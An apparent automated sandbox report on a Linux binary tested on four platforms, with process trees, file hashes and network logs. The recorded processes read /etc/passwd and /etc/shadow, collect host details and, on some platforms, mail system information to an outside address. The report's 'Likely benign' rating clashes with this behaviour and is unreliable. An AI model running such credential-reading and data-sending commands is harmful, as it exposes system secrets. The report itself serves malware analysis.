Analysis Overview
SHA256
90be418508dffa4910e0fd27fd29627260bb3fab2147344c624f99c51fd56404
Threat Level: Likely benign
The file 15c7b600329249a4895395e61a9a88fe_JaffaCakes118 was found to be: Likely benign.
Malicious Activity Summary
Checks CPU configuration
Reads CPU attributes
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-27 11:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
11s
Max time network
131s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/bin/grep
[grep inet]
/sbin/ifconfig
[/sbin/ifconfig]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/bin/sleep
[sleep 5]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| GB | 195.181.164.18:443 | tcp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | 335ece3e9dba12747d3e10bb8db453dd |
| SHA1 | 03c7fbd3b7ac9aea1fb78136361a948513d89ee8 |
| SHA256 | ca61c9a13c329ab2e5b8171436f31ddea0d2283f7a2616e2d50e4656f9c63be4 |
| SHA512 | 3c9e53b8c10ee9c8b8c727d9ed897b88773d2b201d961b945a0afdfe627bfe04ca258b35f2d409f9e4d93ac117bce3f503c29f36c4a65d0c4d389d181959a32e |
/tmp/info2
| MD5 | b0b11628c9fc34dacdfa7064ad4e04b0 |
| SHA1 | e214b69b58448da323912968aad22e9148704847 |
| SHA256 | caa61489c7e16b8d6d829b03db34fa7b5d878adc6eaca3bb755fdab2749d3f52 |
| SHA512 | def71617c0672e34b8a98d4a6c851d36b839895d5b84d48dc4ee3023aff12072b1bbbc26f822aa2c17c6b935325d5fb7b7f4116cf87e1ac472eb1e73d1cecfcc |
/tmp/info2
| MD5 | 29ebed68cace8f8b5105c01253263b8e |
| SHA1 | f1f23c180947993968dd7ace165936e21f598ac4 |
| SHA256 | 4258bd3c42b7e89fbb33d60c5f2adc4216e87c77643202f7caecde87ac87c9ab |
| SHA512 | 39e8b1c4c6f8ac6634f4581bc152aaa2402a9cd99eccfb4430de0d694306390808cacab654e079ec2df779f9b7844a44277fc1039f4a403a98a5ebcdcdd53bac |
/tmp/info2
| MD5 | 8cb7586a325ebd65d8e4f23246986562 |
| SHA1 | 48c5f5806446ecf76120daf4336bdf755f518ac3 |
| SHA256 | 460c7ebd8b4f7c14b75e05d96307796cfb092fa88a8c0915e7ea115c9846f478 |
| SHA512 | a6adb0766e868481f2739010042554be44d90a1a9ea3c97411547579c55588bc3544227a2d73e8a966c0230a205a7c96d99e122ba832904376edc3787714453a |
/tmp/info2
| MD5 | f98849479006f7b7801f2c55e02be569 |
| SHA1 | 27701cea48f1e0fd27586e0976c8b12f7195f29a |
| SHA256 | e47942d84e33bdd142e170dbf479f017ee801d6c4007737f43eae9030e784782 |
| SHA512 | b32b4cf0d6fddf752d80b388572d0e96740525f3ac895321c03d987fda6926940160b7944aeacbe31bf47e9b6915dc3ec9c0ecb94e580e79fdd16c826abdc732 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
debian9-armhf-20240611-en
Max time kernel
18s
Max time network
21s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/free | N/A |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/muMv7q9y | /usr/bin/mail | N/A |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
| File opened for modification | /tmp/mu0nxEma | /usr/bin/mail | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/usr/bin/mail
[mail -s Linux debian9-armhf-20240611-en-7 4.9.0-13-armmp-lpae #1 SMP Debian 4.9.228-1 (2020-07-05) armv7l GNU/Linux [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-7 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9o-0000BP-2E]
/bin/sleep
[sleep 5]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1sMl9o-0000BP-2E]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9r-0000Be-Ow]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-7 | udp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | 903670a38483b980318f98b150af5e7e |
| SHA1 | d9b2a72f60d7cd0aa21eab4dc978be181ea241ae |
| SHA256 | 93fe87fb401dedd150de8622a5422e07f50d2113d1637da87160399e917fbc96 |
| SHA512 | 98d0477745e111563325df8254a95a7e1305522e6daf659791ad157eeb4ab949d883f95a12b3c9ef390ad2f746050539d535ad433d82c8dbb29913d56c3c4d3e |
/tmp/info2
| MD5 | 88d609b25a8d9c552cb539261483f936 |
| SHA1 | ede078695f97bf559efbf3d4c86776c2037315c2 |
| SHA256 | 03153481a83245ce82a3b3ecf76684446d129ae759fe91d154ebaa6b87ce606d |
| SHA512 | 196fc9f706a4a1a3fe7b55525a44ecbb511d7074a0d6a5e310474049e17df6e40e450a8c70de6e16ee196d29f7a84bc9360e5d1dc30cb87c1605e9f127c9c6ab |
/tmp/info2
| MD5 | 6bccf5861b3d60ff36a794f0b9c90898 |
| SHA1 | 65b6ed091dda6e7ec7e3ca3646880d018751e2ca |
| SHA256 | 4a31dab07ccaafacfad98c186640e2e4c86af6b96d10818732af23924731437a |
| SHA512 | afcf7b5a76ad39de053e82bd4bbe39bac370641a86593a10f103c2d9237d39697d3e87893c5578eef6ed0d594016fc0eedcb9189b3db2ef89f4c73866dbedf48 |
/tmp/info2
| MD5 | e8cf5823d4b3e8f453cfae1dc1e343ed |
| SHA1 | b277cad63e1daec54027bca427be63713742e646 |
| SHA256 | 8aeb6b0cdaa39af408d33a71784981cf1be5e251b1817af3d5f169798be77d94 |
| SHA512 | 001d2e7f43322802c9f2bc6ae633a3e8f6703a8247e30ac91c7c2e62ff4c3839befe24d458c885ab81c65f555057733e2bb9e80e17c0a31f99be3d3d03e4dc19 |
/tmp/info2
| MD5 | 7289e35b3777e55732c7832cd79a196a |
| SHA1 | bd5d2ed181de9ecbfa8863e379743772b8467c23 |
| SHA256 | 38272b344be7cc003a9535e0bcd4e3fa520997e7363168468e0e598e8f9d149b |
| SHA512 | dbcab41ed6b7ac1277b5e5f153876bb4a406ea829d884ba1ba4c386c6981148ae6a9615e951d885721fdae1fc58ab82c4e46dd0611959ad2a188e5f524c57f51 |
/var/spool/exim4/input/1sMl9o-0000BP-2E-D
| MD5 | 252e90165600b216897520af4651d365 |
| SHA1 | e7c3d7d22a455c6b4be3da584df8c464017349d7 |
| SHA256 | bae03c9507e59c15c707124b7317d6f27b932ea2d68e878aec0295069e825138 |
| SHA512 | 04d0a8dc3c8c0146e2c630499f93d90fa13afba1cb739f4d96b9c116d5f5e9d07ff275317bb6a3aa9af5c7228a99f00481ae757509b9212732dc8419d1405e09 |
/var/spool/exim4/input/hdr.707
| MD5 | 9c5dee6e7563e37f484ccf907157edda |
| SHA1 | 8a681af6a7489a07bac173eb20f130ddfe411807 |
| SHA256 | 8f26da4161c54fdf411dd0602b4b3da166bd30e62219f8e654034e3ca4ae09ca |
| SHA512 | 674d4ca5f963dd95b3fb97f2a076088e6e043c70001b49a99c77fea25bf7a77823a854f2f20d1be5817c8ea3de8d74fcb9c5a91efb6f21afc13ba9508d0bdc3f |
/var/spool/exim4/msglog/1sMl9o-0000BP-2E
| MD5 | 8608aa6c39c516a1b3dbe2ce47801e1a |
| SHA1 | fd0b1152dd65f80e190577824d5b9cee7ff2a7d6 |
| SHA256 | e9b1052de7904483433f1d3175ebaebc5ae46be8fcf3cb9dea2ce616035e1c59 |
| SHA512 | d67b34370cabd108d4cf88fe0afcdfdaeae480693729374228e915a1cd781e3b41d964e76e76a916d993d2560dc3a17b10a0fe9d50fb05418293b03405bee734 |
/var/spool/exim4/msglog/1sMl9o-0000BP-2E
| MD5 | b2e0e175bb592a71f906ce85f1b0c777 |
| SHA1 | 76ac787566330e04cff1f37c24d7ca816790b7ed |
| SHA256 | 4cd942bbe021a0d12194269980962e9421099503fe47385123755e9c7356758d |
| SHA512 | 5066df3ec71822928c51f750fda681cd8a504e4e329166ae1f171c708bc552df39e1746ed7a01e3e27a4b6dfc952562afe55d2f4cc57d97fac8a1eea608060fc |
/var/spool/exim4/input/1sMl9r-0000Be-Ow-D
| MD5 | 44e43453150ae4e9261ebecfd33dc5bf |
| SHA1 | 73fff7b9ff889747216ee28d4c46ca6a01df2cce |
| SHA256 | da736bd8e4c48a02bb65e0e5939088f2c27d6b94e89d8b257d2ace187ad63dc8 |
| SHA512 | 67ca65ab0621c3d6731931c0eec0326897b9661a837c3f5bb797c4a39d346f4942212d02bad93f74e81b79d94f8d09da0565746b647cffee573855358b34028d |
/var/spool/exim4/input/hdr.722
| MD5 | 79c9a7ba4c3d1c644772cb3842d75248 |
| SHA1 | 1ead640a1d571c30b7f6ae076f238f9e8c134405 |
| SHA256 | 7a8ac66d9cb22a7838421613dbb65e69c43914fe68e1aba6282c6f354db4e4cc |
| SHA512 | a8841db8a238a9c525253f0b9a269c10264278c172d9b5f8bd4a6fc662850c13ece3b555d3996692e94215d4dd8f93b9a647c41052ff3576f8e7017b1d75f567 |
/var/spool/exim4/msglog/1sMl9r-0000Be-Ow
| MD5 | 0c05b6c2476107483ffeefeef603d247 |
| SHA1 | 3eb339f9c6bcabfbf969d002d234474001fbe604 |
| SHA256 | 53b1be03c1c48c27c05a9984b6150eefa970a93e40d0225e3d6a9b6404d7e267 |
| SHA512 | 7404c2e39887c7b39cc03983f90caa3b8eb7e578d2206d21d170fcd2aa6a0951788bc7ffc5631ed9beb34985861fbdfea63b3e473f73775367dd734fdd87d15d |
/var/spool/exim4/input/hdr.713
| MD5 | 6f6a7c6c332a08ab6c982acdf34117f4 |
| SHA1 | 03e8c95d020a9f6ec81b1838caf656fc7154e26a |
| SHA256 | fbd687a45d5d3d545f24d4651f334327ac33eb4e39e31f149a8c076eb36a735d |
| SHA512 | a0be90e8ec23963268f29ed89ca44a74eedeef440802009111169847f9cb852052b264b2f0a55c396732aee907e1473c0c8e65d5a8e2ef202a84281f7985825e |
/var/mail/user
| MD5 | 4275f4ffb87a044f6315d870df0b37a3 |
| SHA1 | b71f04a5f73286bba95e04b4a488b2cb5e4118c4 |
| SHA256 | a61118165453514b76f7a1f175500d55a7382a0d24d34dac715b198986443f72 |
| SHA512 | 2f87fc51fc1a504769be18c6269170901f06e82d304723a2edcd5676d7d5d676e98c26168972bdec6fc53b1cd6fe3d52e3152626325a2612550bdb615fe12266 |
/var/spool/exim4/input/1sMl9r-0000Be-Ow-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1sMl9r-0000Be-Ow
| MD5 | 349f43aeee342f44d53f7268d8a96269 |
| SHA1 | 737b1f30b9c7e72f20411996dbfab05ad0c258cf |
| SHA256 | 37f4959f2c9ba4116f2949ea3da25e065a7cf7bb76de82ab85249e1f51106925 |
| SHA512 | 590e87f2871a419cee80fb9f25d4180ef1076d0b41c6f253c4fdbd82df48b1bf87674a8de1edca97037e8be37cb4d6d8541642099a23ae3434ac8c40b2f5a47a |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
debian9-mipsbe-20240611-en
Max time kernel
30s
Max time network
34s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
| File opened for modification | /tmp/mupIalin | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mupzzMbI | /usr/bin/mail | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/usr/bin/mail
[mail -s Linux debian9-mipsbe-20240611-en-2 4.9.0-13-4kc-malta #1 Debian 4.9.228-1 (2020-07-05) mips GNU/Linux [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240611-en-2 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9w-0000Bv-NJ]
/bin/sleep
[sleep 5]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1sMl9w-0000Bv-NJ]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMlA5-0000By-UI]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-2 | udp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | e797a6d6452f2e9b0bec3fb481474e76 |
| SHA1 | 8210d76a37aa5214ca436f510647134647a2020e |
| SHA256 | ea81f932b0736b26fa123427b61d4fb505d631553a0e5c0b7281e956b6e1e36e |
| SHA512 | aa8d94576a38eb29b6bf7a70c478cbe5dbb04e972d0d4596afef091b9f4df6133796d1a0ab183ec6902c18572995767653580b52fc5c0d98f78f3e10a1b86713 |
/tmp/info2
| MD5 | c9d801e5d5f2753a07c1a307045b8cf2 |
| SHA1 | 29001e54f57a5e264b3760f70c5d6b3c34850e9f |
| SHA256 | f34b16685e23364aaa810d0e190d5992da35c440ab9c1a2770f652ecb8b0831f |
| SHA512 | 5643bc1ad8812d520dd89d10080f5d2f7c8cacde58e2e4bccbcde01e75887ea836bc22add7e01e652ef3f5317a736775dce934d3a5a492c035acea2f3073cbd6 |
/tmp/info2
| MD5 | 8ca71b821bac4b134680ec78feefd883 |
| SHA1 | 3954007726c32e7c4a79a404bbb30000f0cc0ebb |
| SHA256 | 334748cfac8c69e731eab0a1b10b531c0f9c5fe9480d59d4d8d71ccbe58fd097 |
| SHA512 | 29ce141eacc766a7f32dd685e4ab473f8ec230bcc522ae61ed190b4491f291169b23a6403a90b7a728367ffa59f67e0d0bf60e0469d748681cb7496aa37e82d7 |
/tmp/info2
| MD5 | 0e3e21bce64867fc6bec23e24d08f81e |
| SHA1 | fdc6cfb76e7ac6547e437cf0b8b21881a4c4ddbf |
| SHA256 | dbbd961c7bb7342809575a9d52c4f2ec25f40a8fa9812dc3c2438cbac4c65ce8 |
| SHA512 | 3f9eb23aaaa5614b50478d458bb3a0d5d5334129c33a487496563545bbd5860fa0857e288c612ab766008f368c501c708b1a38bbc0d88522fec95c878bc7311f |
/tmp/info2
| MD5 | 14d0b7ed1644a1c2b90e919b47e3e6ce |
| SHA1 | 8c044a952a046cc558af0ce3ae8a43bb72b0ce94 |
| SHA256 | 7915b58d0bf16108faf62a5858f3e978017e15fc7f0b66b2879e2fdcf9f5c99c |
| SHA512 | 755364b301a0a8038b43fa973b60bebb18cf8244e23117b54f6da4b78726b39d7ce15020bde8d37a43e7c09e7971b32fc87a69bc22497984dc202a066ad94b70 |
/var/spool/exim4/input/1sMl9w-0000Bv-NJ-D
| MD5 | 453f20bbeede53fd99eb3ec6208f7f71 |
| SHA1 | b8c6aa011f756fec1a0945f46d2c49cac0605cf0 |
| SHA256 | f46e288f77b829e278186e6843394db376c2b9625ad1604ccdc96683980b354c |
| SHA512 | d350c4d624582f772ae8320aeef22441082ce477c1c1e70a5ec3268bdb27e2052c6f49ba7566385fbced6f1c426c78e41bb76d0dbdf985f26737a3b234093262 |
/var/spool/exim4/input/hdr.739
| MD5 | 3ed04779713171e36899d34c25d062cc |
| SHA1 | fe6ccaea89a75bc9cce7c22524e006c27b5c1fa6 |
| SHA256 | 2494873187b203be20d9c4ab8af2d6ca64401a84f4957d1373a8bcabfd87af58 |
| SHA512 | 9ef0dc52c2a21671e4619aa6d3e86d2168d467a5fcc17928c478b0ff2eb7404510f86ac5ffb3085aa37b34716a1b432047c7e1f22cb8c19d0f7cb2d485e1349c |
/var/spool/exim4/msglog/1sMl9w-0000Bv-NJ
| MD5 | 048a07fe652656dd62d266caf0b06708 |
| SHA1 | 03d19037e01a2ebe61182cc6dabca88b5b2bde5a |
| SHA256 | 57570f974e28d43d722700ac288b4457c397f1d325473861ae9c6de9b700dd29 |
| SHA512 | 942b6838547f1ccfed6d8c89ddb02fe7bfddfef61504ee81534b4cbb0e601a7f326e52a2a451cade02dd025169fddad5bb0c7797ccc93f3253cfc06597488095 |
/var/spool/exim4/msglog/1sMl9w-0000Bv-NJ
| MD5 | 53ca7b4a51ac3e72bbdd33bea20f0cec |
| SHA1 | f7d54fa6d04862b47739c5c499af59dd97a6ae03 |
| SHA256 | c4aee2a5fa29c5a1dc7d6659c59f5d891fa485ae28b15c82e5a5c6fdad4c21b2 |
| SHA512 | 24005a40edaaf919e6d4613f9ad03bc13392ea15c4f5c75ef92512484ca1aec4e021c8c3996f3618fd11c3760f2fbd20939782c8805c888bd2f4e9b3d88d230b |
/var/spool/exim4/input/1sMlA5-0000By-UI-D
| MD5 | 20023cb42dbe41f228b4e2cf4007167e |
| SHA1 | 6af3ea0cd0c8cbc12a224096649059b69382fee2 |
| SHA256 | 9c1b9f7501cb6b313d7b546da8642ccbd2ca3e690f88c622d978cfa108d7bb73 |
| SHA512 | 7bc739217f93bf7b0bd3449f6b4265b18e5a58b65b548c79fe9321a5074f8c282fc85234ec4869f6c48552320b7bea3ab6f3cfcbc8770d3c30a23b611be8640f |
/var/spool/exim4/input/hdr.742
| MD5 | 04c0e4bc633cecf474451473b5d6fd02 |
| SHA1 | fc36aa04aa72a6e1e7579e2fdd87a14e829db072 |
| SHA256 | e42d5d25a2d6df4bad7220532f6f86143c335d59126081bc819a9757e06d3e45 |
| SHA512 | fe0c761d296d961d43dece017042d886ae36d7a305d8f01d1b375444019f49ce1d40d29f1db522d8aff035fe02cea379fffc510e8d013290e0ac7317d99e40a3 |
/var/spool/exim4/msglog/1sMlA5-0000By-UI
| MD5 | b221a8c13389abbd0069b1c2d52ff46b |
| SHA1 | 2ae7bc305f7b522bfff983631d9618f886e2c05e |
| SHA256 | 00eb4c323523445aac3deb567e655d9f5b1af8e5084aecde6d94c384a452c0aa |
| SHA512 | 778d7c8cb4dfa3e3087e76e472f79186b05546f0369515ae5c7b591ba52cba2976cd9f595672406423cb3b2d8acfe0c32aacdecfd008d63940d75af70a8de76e |
/var/spool/exim4/input/hdr.740
| MD5 | cfb0b0402ff7d8109eb1b64e7b0c7981 |
| SHA1 | b66a627119d421436ed532bea9d0c7b623d8e1b0 |
| SHA256 | 5ce4748fa7565dca1033969124c7d59665194866c9d538b936e09893eba47438 |
| SHA512 | c1ed34bb32bce5c164c8586cb34a0cb493d9aad8f7af91b74ea5a47ba5e636c96c6c2206b0b11d3268600054a6d4001bffe5af33d515b203570ea9ec2fc71a85 |
/var/mail/user
| MD5 | 5471f53b1487964143cead1539c0156a |
| SHA1 | e263808dfc68ccacfadcf4e2bce740e86b861e09 |
| SHA256 | 64328ba9c42cd8845f54a82f2b8eed2e87a52d1d4c542f871cea58ccce2fd7a6 |
| SHA512 | 80a9c221fc7df2b4629ac0e2d256cdbf880fd74655826d565362fc779b6332d08fa250a499a0164af0ac3324a991327653b8e157456ca8052858b1ac8a688e62 |
/var/spool/exim4/input/1sMlA5-0000By-UI-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1sMlA5-0000By-UI
| MD5 | 82c17bdf35cfac7d40462a6dd625d604 |
| SHA1 | 8823a4e271af438824426321e878b741d65842f7 |
| SHA256 | 7e958c707c812ce28f022200c129abc94fd881cffe8e2cdd0e9add1256fa21c0 |
| SHA512 | f6fa5ab5e9cbf5fccb203f0f9e755bb09a57defb814d11844d9ed1195fbf969d9986a056a3c6c815b47519f0520dd8e969efcfe20d01f9285781c9745e186ea9 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
debian9-mipsel-20240418-en
Max time kernel
13s
Max time network
12s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
